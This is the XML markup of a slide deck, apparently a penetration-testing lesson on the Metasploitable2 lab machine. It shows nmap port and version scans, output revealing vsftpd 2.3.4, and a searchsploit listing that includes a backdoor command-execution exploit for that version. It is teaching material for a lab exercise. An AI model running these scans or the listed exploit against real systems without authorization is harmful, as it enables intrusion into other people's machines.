              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>Info:</a:t>
            </a:r>
            <a:endParaRPr b="1" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># info &lt;module / platform name&gt; </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" u="sng"/>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Metasploitable2 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Google Shape;166;p18"/>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p>
            <a:pPr indent="0" lvl="0" marL="0" marR="304800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>Scan every TCP/UDP port:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="304800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># nmap -p0-65535 &lt;ip addr&gt; </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="167" name="Google Shape;167;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1454106"/>
            <a:ext cx="3764425" cy="302464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Breaking vsftpd </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Google Shape;173;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Great - my host is running vsftpd, is it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Nmap Service Version Detection:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># nmap -A -T4 -F &lt;host ip&gt; </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Output: </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>PORT     STATE SERVICE     VERSION</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21/tcp   open  ftp         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>vsftpd 2.3.4</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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Breaking vsftpd: Using Searchsploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1300">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>Searchsploit:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>“searchsploit, a command line search tool for Exploit-DB that also allows you to take a copy of Exploit Database with you, everywhere you go. SearchSploit gives you the power to perform detailed off-line searches through your locally checked-out copy of the repository. This capability is particularly useful for security assessments on segregated or air-gapped networks without Internet access.”</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="130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Breaking vsftpd: Using Searchsploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;184;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root@kali:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>searchsploit vsftpd</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>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&lt;output omitted&gt;</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vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                                                                  | exploits/linux/dos/5814.pl</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vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                                                                  | exploits/windows/dos/31818.sh</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vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                                                                  | exploits/windows/dos/31819.pl</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vsftpd 2.3.2 - Denial of Service                                                                                                | exploits/linux/dos/16270.c</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>| exploits/unix/remote/17491.rb</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>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root@kali:~# </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>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